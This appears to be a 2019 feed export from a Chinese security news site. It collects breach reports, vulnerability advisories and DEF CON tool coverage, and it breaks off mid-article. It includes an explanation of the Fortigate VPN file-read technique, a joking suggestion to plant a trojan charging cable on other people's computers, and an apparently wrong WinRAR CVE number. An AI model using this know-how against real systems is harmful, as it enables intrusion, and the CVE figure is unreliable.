安联智库--网络安全新媒体资讯平台 http://seczk.com 信息安全资讯,热点资讯,安全期刊,人物专访,安全事件,漏洞威胁,安全技术,攻防众测, Sun, 18 Aug 2019 13:46:48 +0800 zh-CN hourly 1 https://www.s-cms.cn/?v=4.7.5 加入我们 Sun, 18 Aug 2019 13:46:48 +0800

      欢迎有志从事信息安全的朋友,一起加入安联智库这个大家庭,有你们的到来安联智库将因你而出彩!

]]>
联系我们 Sun, 18 Aug 2019 13:46:48 +0800

安联智库&安联攻防实验室(简称:seczk)www.seczk.com
使命:让安全,更简单!
提出:攻击溯源、纵深防御的安全治理解决方案!
微信 、QQ:110468258
网站:www.seczk.com 
邮箱:110468258#qq.com 
地址:广州市天河区黄埔大道西505号A栋2519室 
机构:[广东-广西-海南-云南-贵州-四川-福建-江西-湖南-北京-深圳-重庆-上海.....] 


]]>
团队简介 Sun, 18 Aug 2019 13:46:48 +0800

    安联智库是为了(简称:seczk)是一个专注于信息安全、具有全面信息安全综合服务能力的专业服务团队。seczk立足自主研发,专注信息安全市场,为客户提供安全产品、安全服务、安全集成、安全培训等多项综合性信息安全服务。经过多年的发展已经成为一个理念先进、方案成熟、团队精干、客户认可的具有本土化特色的信息安全服务商。
    seczk立足于羊城广州,目前拥有一支20多人的专业队伍,团队拥有多名CISP、CISSP、CCIE、PMP等技术人员,核心团队成员都出自国内著名安全厂商与安全服务测评机构(如启明星辰、绿盟、天融信、蓝盾、竟远、南方信息安全研究院、中国信息安全测评中心等),积累了丰富的安全经验,其技术能力已获得过不同行业客户的认可。
    安联智库&安联攻防实验室(简称:seczk)使命:让安全,更简单!提出攻防纵深防御、攻击溯源的安全治理解决方案!




]]>
外媒:“有史以来最大规模”的数据泄露事件并不是那么糟糕 Sun, 18 Aug 2019 13:46:49 +0800 据外媒报道,今年年初曾发生一起称为Collection #1的大规模数据泄露事件,包含了7.73亿电子邮件地址和2100多万个唯一密码。外媒曾称其为“有史以来遭泄露的最大数据集”。而过去类似的大规模数据泄露事件也经常发生。例如,在2016年,有大约4.27亿个MySpace密码和1.17亿个 LinkedIn密码在暗网上出售。

c94ea161b71641c.png

外媒认为,如果仔细阅读所泄露的数据,与过去的其他大规模数据泄露事件相比,Collection #1事件实际上并没有那么糟糕。根据首次报告和分析它的安全研究员 Troy Hunt 的说法,这个数据集包括7.73亿个唯一的电子邮件地址和2100万个唯一密码。

但这里有一些关键的因素。首先,这是几个旧数据泄露的集合。事实上,在这个系列中的7.73亿个唯一的电子邮件地址中,只有1.41亿(约18%)未包含在 Hunt的“ Have I Been Pwned”服务中。在2100多万个密码中,有一半不在数据库中。

这意味着很可能,用户旧的简单密码之前已经被窃取,并且用户应该已经收到过“ Have I Been Pwned”等服务的通知了。正如Hunt所说的那样,“我的希望是,对于许多人来说,这将是他们需要对他们的在线安全态势做出重大改变的提示。”

cb623d86effac19.png

外媒认为,用户需要做的重要改变是确保使用唯一的密码,并在任何地方启用双因素身份验证。当Collection #1之类的数据泄露事件发生时,网络犯罪分子会使用所谓的撞库(Credential-Stuffing)入侵用户的帐户,这几乎是用户在线安全面临的唯一真正风险。这些是自动攻击,黑客通过收集互联网已泄露的用户和密码信息,尝试批量登陆其他网站后,得到一系列可以登录的账户。

而如果用户使用唯一的密码和双因素身份认证,这些攻击将无法正常工作。

9999.jpg



]]>
生物科技公司Suprema泄漏超过100万人的面部和指纹信息 Sun, 18 Aug 2019 13:46:49 +0800 22.png

一个暴露公网的数据库泄露了上百万人的指纹和面部识别信息,再次将“生物识别”推向风口浪尖。

研究人员发现,属于生物科技公司Suprema的一个数据库暴露在公网上,其中包含100多万人的生物识别数据,涉及英国大都会警察局、当地小型企业和各大政府机构收集的面部和指纹识别信息。

Suprema曾大力推销一款名为BioStar 2的生物识别软件,识别方式主要为面部识别和指纹识别,可帮助公司组织管理人员对特殊设施的访问。现BioStar 2已被近6000个组织采用,包括跨国公司、政府、银行和英国大都会警察局。

研究人员表示,在8月初,他们在公网发现了一个可直接访问的ElasticSearch,其中包含“高度敏感”的23GB的生物识别数据(涉及100多万人),都是由BioStar 2从客户处收集而来。

vpnMentor的研究人员在周三的一份报告中表示:“这是一起巨大的信息泄露事件,不仅危及相关企业和组织,更威胁到他们员工的人身安全。我们团队能够直接访问超过100万条指纹记录以及面部识别信息,再配合上个人信息、用户名和密码,易滋生大量犯罪活动。”

55.jpg

除了指纹和面部识别记录(包括用户的图像)外,其中还有未加密的用户名和密码等一系列员工个人数据。这些数据共有2780万条,涉及员工的家庭住址、电子邮件、员工记录和安全级别等等。

研究人员警告说,如果攻击者能够得到这些敏感信息,他们就可非法访问使用了BioStar 2的用户帐户和设施。

33.jpg

此外,Webroot的高级威胁研究分析师Kelvin Murray在一封电子邮件中表示,从这起安全事件可以发现,这些人体生物特征以明文形式存储,未经过哈希处理,这可以说是完全不可接受的。

44.jpg

他认为:“生物识别技术中的生物信息的保护力度应该高于对传统的身份凭证的保护,因为它们永远是你的一部分,你也不能重置指纹或人脸。一旦指纹和面部等生物信息泄露或被盗,对于受害者来说,就永远存在被冒充的风险。这也是生物识别技术作为一种身份识别手段的最大弱点。”

此次泄露出去的数据主要是BioStar 2从6000多个公司组织中收集的,其中还包括几家总部设在美国公司,如Union Member House,Lits Link,Phoenix Medical等。

尚不清楚这些数据是否被除vpnMentor以外的第三方非法获取。在被发现8天后,这个ElasticSearch得到了妥善处理。

生物识别技术的困境

这起事件加剧了人们对生物识别技术安全性的担忧。

像面部识别和指纹识别这样的技术已被全球各类执法部门积极使用,白宫也是如此。且在今年4月,欧盟还批准了建立一个庞大的生物识别数据库,融合了执法部门、边境巡逻部门中的欧盟和非欧盟公民的数据。

尽管人脸识别优势明显——更高效、更快速的身份识别——但同时,由于现实世界中和生物识别相关的应用爆炸式增长,让安全专家们对隐藏在其中的某些根深蒂固的隐私安全问题感到担忧。

Checkmarx应用安全策略全球总监Matt Rose在一封电子邮件中表示:“在我看来,这起事件比最近任何一起大规模数据泄露都要糟糕,因为它甚至可能滋生恐怖主义活动。这起事件也让人们意识到,有些企业对用户数据毫不关心。如何尽力保护用户数据,也许是未来评价好企业的标准之一。”

这也不是最近发生的第一起生物识别安全事件。今年6月,美国海关和边境保护局表示,有10万多名进出美国的旅行者的面部和车牌照片被泄露。

vpnMentor的研究人员也表示说,生物识别的最大风险之一就是“人脸和指纹信息无法改变”。

一旦被盗,就无法挽回了。BioStar 2虽然是由一家安全公司制造的,但存储这些信息的方式居然如此不安全。

信息泄露

研究人员于8月5日首次发现了这个可随意访问的ElasticSearch,并于8月7日联系了管理者。虽然该ElasticSearch最终在8月13日被关闭,但研究人员表示,整个沟通过程非常混乱,Suprema基本上是毫不配合。

“我们的团队多次尝试通过电子邮件与该公司联系,但均无回信。最终,我们决定通过电话联系BioStar 2软件标明的办公室,但也基本上没有反应。”

直到本文发布时,Suprema没有回应来自Threatpost的评论请求。

9999.jpg

]]>
【漏洞预警】Fortigate SSL VPN任意文件读取(可直接登录VPN) Sun, 18 Aug 2019 13:46:49 +0800 2222.jpg

2019年8月,白帽汇安全研究院观测到国外安全研究人员公布了针对Fortigate SSL VPN(飞塔VPN)的漏洞说明,其中一个任意文件读取漏洞利用门槛较低,预计会对全球Fortigate SSL VPN造成较大影响。该漏洞原理是由于使用了不安全的函数,导致未能正确过滤URL中的恶意代码,最终造成任意文件读取。任意攻击者都可在未经身份验证的情况下利用该漏洞,获取session等敏感信息,从而非法入侵并操控VPN,从而进一步威胁企业内网服务。目前官方已发布了安全更新,主要影响使用了Fortinet FortiOS 5.6.3版本至5.6.7版本和6.0.0版本至6.0.4版本的SSL VPN。

Fortigate SSL VPN在全球VPN市场位列前5,无数大中型公司都在使用。此次曝出的任意文件读取漏洞利用方式简单,影响范围较广,可能会在今后很长一段时间内持续威胁Fortigate SSL VPN的用户。虽然此前该品牌的VPN所曝出漏洞较少,但从国外研究人员的分析来看,其内部代码还是存在版本过旧、使用大量危险函数、缺乏安全限制等缺陷,预计在今后将会曝出更多高危漏洞(此次漏洞还可和另一个溢出漏洞相配合获得shell)。

概况

目前FOFA系统最新数据(一年内数据)显示全球范围内共有140947个Fortigate SSL VPN服务。美国使用数量最多,共有31430个,法国第二,共有8471个,德国第三,共有7182个,荷兰第四,共有5205个,意大利第五,共有4895个。

全球范围内Fortigate SSL VPN服务分布情况如下(仅为分布情况,非漏洞影响情况)。

4444.png

中国大陆地区北京市使用数量最多,共有360个,上海市第二,共有260个,广东省第三,共有174个,江苏省第四,共有119个,浙江省第五,共有43个。

5555.png

危害等级

严重

漏洞原理

Fortigate SSL VPN的某个页面在获取对应国家的语言文件时,会使用URL中的lang参数去构建要读取的文件名,示例如下:

snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);

以上函数没有任何安全保护,虽然貌似只能指定json文件,但实际上我们可以利用snprintf的特性实现任意文件读取。根据函数的参数,其最多将栈空间-1的字符串写入输出中。因此,我们只需要使输入超过缓冲区大小,.json就会因函数限制而被删除,我们就可以读取任意文件。

漏洞影响

目前漏洞影响版本号包括:

FortiOS 5.6.3 to 5.6.7

FortiOS 6.0.0 to 6.0.4

漏洞POC

目前FOFA客户端平台已经更新该Fortigate SSL VPN漏洞的检测POC。

3333.png

POC截图

CVE编号

CVE-2018-13379

修复建议

1、官网已发布安全更新,用户可以网址https://fortiguard.com/psirt/FG-IR-18-384获取。

2、如暂时无法更新到最新版本,请及时下线设备。

参考

[1] https://fortiguard.com/psirt/FG-IR-18-384

[2] http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201905-1026

[3] https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html?m=1

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

9999.jpg

]]>
能远程控制你电脑的苹果充电线正在生产和售卖,走一个? Sun, 18 Aug 2019 13:46:49 +0800 近日美国著名黑客文化年度大会defcon举办完毕,会上很多稀奇古怪的议题和工具齐放光彩,从大会公开的资料就可以知道种类五花八门。


640.webp.jpg

资料下载地址: https://media.defcon.org/DEF%20CON%2027/


而其中,有一样东西直接在会场售卖火爆:


一根两百美元的苹果充电线

(1400块人民币)


这根充电线,极具匠心,纯手工打造,长这个样子,完全看不出异样。


640.webp.jpg


并且还有附带功能,把充电线插到电脑上,可以通过植入木马,远程操控电脑,是不是很方便!


而错过现场的小伙伴也不用着急,如果你询问大黑客可以承担越洋运费寄来中国,那么你可以直接上他的blog,http://mg.lol/blog/defcon-2019/

640.webp.jpg

再联系他的商店等货即可,毕竟,手工制作周期长,做网络安全也要匠心。

https://shop.hak5.org/products/o-mg-cable


毕竟这么一条红队攻击利器,出门看见别人有电脑,说一声能不能帮忙传个照片或者充个电,利用场景多的是!


更牛逼的是,这哥们把制作充电线的过程都放在了github上,在我勉强凭借大学学习的电路分析知识大概弄懂流程之后,拼凑了一幅图

640.webp.jpg


640.webp.jpg


看不懂的我只能发出github地址:

https://github.com/O-MG/DemonSeed


而这大哥除了搞充电线外,还搞了很多其他诸如

无线安全审计设备WiFi Pineapple(菠萝派),专注利用Wifi钓鱼或攻击的设备;

640.webp.jpg

▲取自网图的菠萝派部分功能展示


BadUSB大黄鸭,同样可以达到插入电脑即可植入木马远程控制的效果,原理就是把U盘识别成键盘并模拟人敲命令执行写好的脚本。


640.webp.jpg

https://lzy-wi.github.io/2018/06/12/badusb/


网络植入设备,如第三幅图所示,通过把别人家的网线拔了,插上自己的网络设备从而达到入侵他人内网的效果,可进行中间人攻击或者内网渗透等操作。


640.webp.jpg


而关于红队物理渗透工具方面,最全莫属下图。

640.webp.jpg

图取自:https://scund00r.com/all/gear/2019/06/25/red-team-and-physical-entry-gear.html

9999.jpg

]]>
能远程控制你电脑的苹果充电线正在生产和售卖,走一个? Sun, 18 Aug 2019 13:46:49 +0800 近日美国著名黑客文化年度大会defcon举办完毕,会上很多稀奇古怪的议题和工具齐放光彩,从大会公开的资料就可以知道种类五花八门。

11.jpg

资料下载地址: https://media.defcon.org/DEF%20CON%2027/

而其中,有一样东西直接在会场售卖火爆:

一根两百美元的苹果充电线

(1400块人民币)

这根充电线,极具匠心,纯手工打造,长这个样子,完全看不出异样。


22.jpg

并且还有附带功能,把充电线插到电脑上,可以通过植入木马,远程操控电脑,是不是很方便!

而错过现场的小伙伴也不用着急,如果你询问大黑客可以承担越洋运费寄来中国,那么你可以直接上他的blog,http://mg.lol/blog/defcon-2019/


再联系他的商店等货即可,毕竟,手工制作周期长,做网络安全也要匠心。

https://shop.hak5.org/products/o-mg-cable

aa.jpg


毕竟这么一条红队攻击利器,出门看见别人有电脑,说一声能不能帮忙传个照片或者充个电,利用场景多的是!


更牛逼的是,这哥们把制作充电线的过程都放在了github上,在我勉强凭借大学学习的电路分析知识大概弄懂流程之后,拼凑了一幅图

33.jpg44.jpg看不懂的我只能发出github地址:

https://github.com/O-MG/DemonSeed


而这大哥除了搞充电线外,还搞了很多其他诸如

无线安全审计设备WiFi Pineapple(菠萝派),专注利用Wifi钓鱼或攻击的设备;


55.jpg

▲取自网图的菠萝派部分功能展示


BadUSB大黄鸭,同样可以达到插入电脑即可植入木马远程控制的效果,原理就是把U盘识别成键盘并模拟人敲命令执行写好的脚本。


66.jpg

https://lzy-wi.github.io/2018/06/12/badusb/


网络植入设备,如第三幅图所示,通过把别人家的网线拔了,插上自己的网络设备从而达到入侵他人内网的效果,可进行中间人攻击或者内网渗透等操作。


77.jpg

而关于红队物理渗透工具方面,最全莫属下图。

88.jpg

图取自:https://scund00r.com/all/gear/2019/06/25/red-team-and-physical-entry-gear.html

不说了,赚钱代购去了。

◆来源:黑鸟

9999.jpg

]]>
网络攻击瞄准个人银行,谈谈5个典型攻击手段 Sun, 18 Aug 2019 13:46:49 +0800 在当今的数字时代,银行和金融服务公司为了提高竞争力,往往为客户提供了在线管理资金的便捷功能。但不幸的是,大多数银行平台都缺失安全设计,这导致黑客一直在利用这些潜在的隐患。

虽然在过去几年针对银行的攻击手段变得更加复杂,但绝大多数攻击依旧依赖于用户欺骗。例如,针对银行的一种常见网络钓鱼攻击,就是将目标定向到恶意克隆的银行网站。一旦用户尝试登录这个看起来很真实的虚假网站,该平台会提示:服务不可用,从而混淆用户,并存储下用户刚刚输入的凭证信息(账号密码)。

这一切都是为了引导用户犯错,而网络钓鱼还只是电子银行时代应该防范的攻击之一。以下介绍了黑客通过用户攻击银行的五种方式:

SMS swaps攻击

短信诈骗在银行业已经非常普遍。首先,攻击者窃取受害者的手机号码以及手机ID,然后打电话给SIM卡中心声称自己手机丢失,并且已经购买了新的SIM卡,现在希望把旧号码取回。攻击者使用那些可能从社交媒体帐户上收集来的的安全ID和其他私人信息,说服电信支持人员,换回手机号。

这种骗局甚至可以逃避安全保护。大多数提供多因素身份验证(MFA)以保护在线银行会话和应用程序的银行机构都依赖基于SMS的MFA,而不是使用移动令牌。一旦黑客窃取了用户的电话号码,他们就可以访问短信,而这也意味着他们可以访问受害者的帐户,即使它具有基于SMS的MFA。

MITM攻击/中间人攻击

Man In-The-Middle(MITM)攻击由来已久,但非常有效,攻击者瞄准的是基础设施没有被充分保护的银行平台。他们不仅窃取资金,还攻击银行的基础设施从而给银行带来负面影响。攻击者通过干扰用户和银行后端之间的网络通信,篡改交易金额和账户信息。这个攻击一般可以通过银行加密通信,使用特定证书凭证来预防。

但是,在使用TLS连接中,发现了漏洞。常见的DNS欺骗技术可以很容易地定向受害者在同一Wi-Fi网络下的流量,从而无法验证主机名。因此,银行防御MITM攻击的最佳方式是通过实施令牌多因素签名。

MITB攻击

MITB(Man-in-the-Browser attack)是一种感染在线浏览器的特洛伊木马。它扮演中间人攻击的角色,嗅探和修改用户在受感染浏览器上执行的事务,但表面上仍然显示用户是在合法输入。

大多数用户认为他们在HTTPS的网站上执行事务时有SSL的保护,但事实上,SSL只保护浏览器和服务器之间传输的数据。

更好的证书管理可以预防感染,但是当用户使用个人计算机进行银行业务时,这很难保证。幸运的是,还可以通过多因素身份验证令牌来保护银行事务。

鱼叉式网络钓鱼攻击

鱼叉式网络钓鱼:攻击者利用电子邮件欺骗技术,通过一个定制的、高度真实的网络钓鱼电子邮件来攻击特定的组织或个人。简而言之,这是一种更具针对性、复杂性且研究密集的网络钓鱼版本。

这种攻击通常用于攻击者所熟悉的组织,攻击者利用内部了解针对特定的负责付款的员工发起攻击。比如,他们可能会向会计发送一封电子邮件,表明是CFO要求他们支付一笔看似正常的款项。如果员工相信了,于是进入虚假网站或下载链接,就会导致MITM或MITB攻击的触发。

移动恶意软件攻击

移动银行木马是最灵活也最危险的恶意软件类型之一,旨在通过窃取用户凭据从而窃取用户帐户中的资金。它们看起来和Apple或Google商店中的真正App一样,但当用户下载并运行App时,它就会开始监控手机里的银行App。由于不是每个银行App的设计都能合理地保护个人的资产,因此,实施不当和开源库暴露都会让帐户和密码很容易地被跟踪。

银行如何防御攻击?

对于银行来说,保护其支付系统的最佳方法之一就是为每笔资金交易添加MFA安全层。即使客户被欺骗登录到一个伪造的网站或点击了一个网络钓鱼链接,攻击者也无法转账或付款。

以上这些攻击操作都依赖于最终的用户令牌,而银行如果MFA控件到位,攻击者将无法拿到这些令牌!银行可以通过使用固定和随机事务属性(如名称、值、帐户、时间戳等)生成基于密码的签名,此外,如果正确实施,MFA也不会对银行应用或服务的用户体验产生负面影响。

最后,银行有责任让客户不断地重新评估他们的安全措施,以抵御上述在线威胁,但客户也在电子银行安全中发挥着作用,需要了解最常见的银行攻击,了解他们的资金何时可能存在风险,并在必要时做好安全防范。

9999.jpg

]]>
漏洞预警:微软再发现两个高危远程漏洞 火绒完成紧急升级 Sun, 18 Aug 2019 13:46:49 +0800 一、漏洞概况
 
微软在8月份的补丁升级报告中,公布了4个远程执行漏洞(CVE-2019-1181,CVE-2019-1182,CVE-2019-1222,CVE-2019-1226)。其中,CVE-2019-1181以及CVE-2019-1182属于高危漏洞。
 
1.jpg 
 
攻击者不需要登录Windows账户,即可利用上述漏洞进入系统,实现远程病毒代码攻击,并且可以横向传播,感染其它电脑。危害与此前公布的“BlueKeep”漏洞(CVE-2019-0708)相同(详见报告《微软发布高危漏洞补丁 火绒“漏洞修复”模块已完成升级》)。
 
火绒产品(个人版和企业版)的“漏洞修复”功能均已完成升级,请用户尽快使用。建议“火绒企业版”用户关闭3389端口(远程登录服务),使用企业版的“远程桌面”功能进行远程办公。
 
2.jpg 
 
二、影响范围
 
受上述漏洞影响的Windows版本包含:Windows 7 SP1,Windows Server 2008 R2 SP1,Windows Server 2012,Windows 8.1,Windows Server 2012 R2以及绝大多数Windows 10版本,包括服务器版本。
 
3.png 
 
Windows XP,Windows Server 2003和Windows Server 2008不受影响,远程桌面协议(RDP)本身也不受影响。
 
三、修复及防御策略
 
1、下载微软提供的官方补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182
 
2、使用火绒“漏洞修复”功能。
火绒产品(个人版、企业版)已完成相关升级,火绒个人用户、企业用户均可以通过“漏洞修复”功能修复此漏洞。
 
3、开启网络级别身份验证(NLA)
对于受影响的Windows 7和Windows Server 2008 R2系统用户,可以尝试开启网络级别身份验证(NLA),从而阻止部分病毒或者恶意软件在未进行身份验证的情况下对终端发起攻击。但是,如果病毒或恶意软件已经获取到了有效的登录凭证,则依然存在被该漏洞攻击的潜在风险。
打开“控制面板”-“系统和安全”-系统,点击“远程设置”,勾选“仅允许使用网络级别身份验证的远程桌面的远程计算机连接”。
 
4.png 
 
4、其它不便打补丁用户
直接禁用远程桌面服务端口(3389)。如企业用户有需求,可使用"火绒企业版"的"远程桌面"功能,替代系统远程桌面功能,进行正常办公。
此外,火绒“网络入侵拦截”功能后续将会添加对上述漏洞的防御规则,可在不用打补丁的情况下,拦截通过这些漏洞发起的攻击,并解析出攻击源的IP地址,方便溯源。

9999.jpg

]]>
微软CTF协议曝出漏洞 影响Windows XP发布以来的所有系统 Sun, 18 Aug 2019 13:46:49 +0800 Google  Project Zero 安全团队的研究员 Tavis Ormandy 报告,微软鲜为人知的 CTF 协议存在漏洞,很容易利用,已在受害者计算机获得立足之地的黑客或恶意程序可以利用该漏洞劫持任何 Windows 应用,接管整个操作系统。

CTF 代表什么 Ormandy 没有查到,它是  Windows Text Services Framework (TSF) 的一部分,该系统用于管理 Windows 或 Windows 应用程序内的文本展示。当用户启动一个应用,Windows 会启动一个 CTF 客户端,这个客户端会从一个 CTF 服务器接收有关操作系统语言和键盘输入方法的指令。如果操作系统输入方法从一种语言切换到另一种语言, CTF 服务器会通知所有  CTF 客户端,实时改变语言。

漏洞在于  CTF 服务器和客户端之间通信是不安全的,没有正确的身份验证。攻击者可以劫持另一个应用的 CTF 会话,伪装成服务器向客户端发送指令。如果应用运行在高权限上,攻击者可以控制整个操作系统。

漏洞影响到 XP 以来的所有 Windows 版本,不清楚微软是否或何时会释出补丁。

9999.jpg

]]>
黑客分享4G无线路由漏洞 中兴被点名批评 Sun, 18 Aug 2019 13:46:49 +0800 5G 时代都要来了,但令人糟心的是,4G 路由上的窟窿我们还没补完呢。据 BleepingComputer 美国时间8月12日报道, Pen Test Partners 研究人员 G Richter 就在今年的 DEF CON 黑客大会上分享了自己在一些 4G 路由设备上找到的安全漏洞。

在他看来,“市场上现售的许多 4G 调制解调器与路由器非常不安全,一旦被不法分子利用,很容易导致个人信息泄露或受到命令执行攻击。”

“我们在多家厂商的一系列设备中发现了可被利用的关键远程漏洞,而且对一个懂点技术的人来说,完全是得来全不费工夫。”Richter 解释道。“要知道,搞此类无线通讯技术的 OEM 商全球也就那几家,它们的软硬件可是会出现在每个人的日常生活中。”

最可怕的是,这些漏洞几乎存在于各种价位的产品中,无论消费级路由还是企业级产品都中招了。

好在,Richter 发现问题后及时通报了这些厂家,在公布自己的研究成果前这些漏洞大多数都已完成修复。不过,也有些厂家态度不够端正。

中兴路由器漏洞

在 Richter 看来,各家路由厂商中最让人头疼的是中兴(ZTE)。在获知漏洞信息后,它们居然懒得修复,直接将 MF910 和 MF65+ 两款路由产品放在了“生命周期结束”一栏,拒绝提供技术支持。不过,该公司网站上可没有“抛弃”MF910 的消息。

随后,Richter 又测试了另一款名为 MF920 的中兴路由器,它与前代产品分享同一个代码库,因此暴露了几乎一样的漏洞。这次,中兴只能乖乖选择修复。

如果你用的是 MF910 和 MF65+,遇上下面问题只能自求多福了。

1. 管理员密码可能会泄露(预认证)。

2. 排故端点非常容易受到命令注入攻击(后认证)。

3. 在完全未使用的“测试页面”还是会存在跨站脚本攻击。

“如果将这些漏洞连起来,只要诱骗用户访问恶意网页,黑客就可在路由器上执行任意代码。”Richter 补充道。要想详细了解 MF910 的相关漏洞分析,可以访问 HERE 网站。

至于 MF920 的问题,则可查询以下两个 CVE:

• CVE-2019-3411 – 信息泄露

• CVE-2019-3412 – 任意命令执行

网件和 TP-LINK 也没跑

网件和 TP-LINK 的 4G 路由也没逃过 Pen Test Partners 研究人员的法眼,它们一共被开了 4 个  CVE。

就拿网件 Nighthawk M1 移动路由来说,如果不设定个复杂的密码,它不但会受到跨站伪造请求攻击(CVE-2019-14526),还有后认证命令注入攻击(CVE-2019-14527)的危险。

黑客攻击的方法与上面类似,也是诱导用户访问恶意页面。除此之外,Richter 还详细讲述了如何破掉网件固件加密的方法。

TP-LINK 的 M7350 4G LTE 移动路由也有问题,它比较容易受到命令注入攻击,为此还被开了下面两个 CVE:

• CVE-2019-12103 – 预认证命令注入

• CVE-2019-12104 – 后认证命令注入

“随着无线网络的不断进步,许多对带宽要求不高的用户已经开启全面 4G 生活了。”Richter 说道。“不过,现下销售 4G 路由器的制造商们确实没那么上心,5G 时代来临后可怎么办啊。”

了解更多:

https://www.bleepingcomputer.com/news/security/4g-router-vulnerabilities-let-attackers-take-full-control/

9999.jpg

]]>
Raidforums攻破Cracked.to黑客论坛网站 曝光其32.1万名成员数据 Sun, 18 Aug 2019 13:46:49 +0800 外媒报道称,近日 Raidforums 攻破了竞争对手 Cracked.to 的黑客论坛网站,并泄露了后者超过 32.1 万名成员的数据。之所以发起这场行动,或是因为一些受害者正在讨论如何破解《堡垒之夜》账户、销售软件漏洞、自己从事其他可能非法的活动。漏洞披露网站 Have I Been Pwned 报道称:Raidforums 在上周五转储暴露了 74 万 9161 个唯一的电子邮件地址。

1.jpg

除了电子邮件地址,Raidforums 还泄露了 Cracked.to 论坛用户的 IP 地址、私信、bcrypt 转储的哈希密码等数据,由网站论坛应用程序 myBB 所生成。

外媒指出,Cracked.to 自诩为一个提供破解教程、工具、组合、市场和更多恭喜的综合性论坛,而 Raidforums 旗下也存在许多类似主题的论坛。


2.png

外媒 ArsTechnica 概览了一遍 Raidforums 公布的 2.11 GB 文件,发现其中包含了近 39.7 万条私信,且大量涉及诸多黑客极力避免的细节内容。

详细内容包括用户名、电子邮件地址、求购记录、销售或支持的软件服务、以及针对人们视频游戏《堡垒之夜》账户的破解等。

除了一些笼统的信息,还有部分论坛用户提到了如何利用 CVE-2019-20250 这个在今年早些时候被发现的严重漏洞。其与 WinRAR 文件压缩程序有关,可在易受攻击的计算机上安装大量讨人厌的恶意软件。

外界猜测,Cracked.to 的大量访客,可能是通过暗网或其它隐匿 IP 地址的方式来访问该网站的。所以公布出来的用户名和邮件地址,也极有可能是匿名或伪造的。


3.png

即便如此,执法部门或竞争对手仍可借此来实施一定程度的打压。对于网站管理员来说,这起事件也算是向他们发出了一个警示,毕竟 Raidforums 声称是通过某漏洞利用来实现的“脱裤”。

几个月前,Cracked.to 管理员称其已将默认脆弱的 myBB 哈希密码转储,切换到了更加强大的解决方案。但在此事发生后,该网站已强烈要求用户变更密码。

此外,我们不排除 Raidforums 已经获得 Cracked.to 管理员密码、或向其它网站发起了类似攻击的可能性。

9999.jpg

]]>
英国航空公司电子票务系统泄露大量乘客数据 Sun, 18 Aug 2019 13:46:49 +0800 22.jpg

近期,英国航空公司电子票务系统曝出信息泄露漏洞,可以让攻击者非法查看乘客的个人数据或更改他们的预订信息。

有研究人员于本周二称,英国航空公司通过电子邮件发送给乘客的乘机登记链接没有进行加密,攻击者很容易从中读取出受害者的预订号码、电话号码、电子邮件地址等信息。研究人员告诉Threatpost,据估计,在过去的六个月里,和英国航空公司有关的存在缺陷的链接共有250万条,因此该漏洞的影响很“显著”。

研究人员在周二的一篇报告中表示:“为了优化用户体验,乘客的个人信息都被包含在英国航空公司的链接中,再通过邮件发送给乘客,乘客可直接点击链接进入英国航空公司网站,查看他们的行程。但由于链接中的数据没有被加密,导致乘客的信息泄露。”

这意味着位于同一公共WiFi网络中的攻击者可以很轻易拦截链接请求,伪装成正常用户,进入乘客的出行页面。更糟糕的是,某些机场早先因其WiFi网络的漏洞而臭名昭著。

攻击者最终可获取受害者的大量个人数据,修改他们的出行信息。具体包括:电子邮件地址、电话号码、会员号码、姓名、预订号、行程、航班号、航班时间、座位号等信息。

这一漏洞最早于今年7月被发现。在研究人员发现这个漏洞后,立马通知了航空公司。

但是,研究人员告诉Threatpost:“我们的研究小组观察到直至本周仍存在信息泄露迹象,我们认为漏洞仍然没有被修复。不过,英国航空公司近期一直在与我们联系,我们也希望能尽快解决这个漏洞。”

33.jpg

据英国航空公司称,泄露信息不涉及护照和付款信息,也没有证据表明有任何客户的信息被窃取。

英国航空公司的一位发言人告诉Threatpost:“我们非常重视客户的数据安全,我们已意识到了这个问题的严重性,正在采取措施确保数据安全。”

今年2月也曾曝出过类似的漏洞,主要涉及8家大型航空公司。包括:Southwest、KLM、Air France、Jetstar、Thomas Cook、Vueling、Air Europa和Transavia。所有航空公司在漏洞被曝出后都接到了通知,被敦促采取行动,确保数据安全。

研究人员强调,航空公司在为客户办理登机手续的过程中一定要对数据进行加密,并对所有访问私人信息的行为进行权限鉴定,特别是当涉及信息编辑时。

英国航空公司在过去一年里屡次受到网络安全丑闻的困扰。

2018年9月,英国航空公司表示,受8月份所曝出的网站和移动应用的漏洞影响,大约有38万张银行卡的受到影响(后来该数字还上涨了18.5万)。2019年7月,英国航空公司被控告要求支付创纪录的2.3亿美元罚款,原因是2018年发生的数据泄露事件影响了该公司的50万名乘客。

其他航空公司常受到安全问题的影响:加拿大航空公司今年8月表示,有2万名移动应用用户的护照信息被泄露,建议所有用户在发现8月22日至24日之间发现“不寻常的登录行为”后修改帐户信息。今年4月初,达美航空表示,“一小部分”客户受到了植入到第三方服务的恶意软件影响,泄露部分敏感数据。

9999.jpg

]]>
微软发布补丁:修复了远程桌面组件中存在的两个高危漏洞 Sun, 18 Aug 2019 13:46:49 +0800 在2019年8月的补丁星期二活动日中,面向Windows 10发布累积更新的同时微软还修复了存在于Remote Desktop Services组件中的两个漏洞,微软认为这些漏洞是“wormable”。和两年前的WannaCry攻击类似,无需用户进行任何输入的情况下在网络的电脑之间传播恶意软件,因此这些补丁是非常重要的。

22.jpg

33.jpg

CVE-2019-1181CVE-2019-1182利用了和今年5月发布的Bluekeep相同漏洞,推荐用户尽快修复。Windows 7 SP1,Windows Server 2008 R2 SP1,Windows Server 2012,Windows 8.1,Windows Server 2012 R2和所有版本的Windows 10(包括服务器变体)都受到漏洞的影响。只有较旧版本的Windows(如Windows XP,Windows Server 2003和Windows Server 2008)才不受该漏洞影响。

虽然它们使远程桌面服务(RDS)易受攻击,但它们不会影响远程桌面协议(RDP)本身。为了缓解这两个漏洞,微软建议那些启用了网络级别身份验证(NLA)的人可以对漏洞进行部分防御:

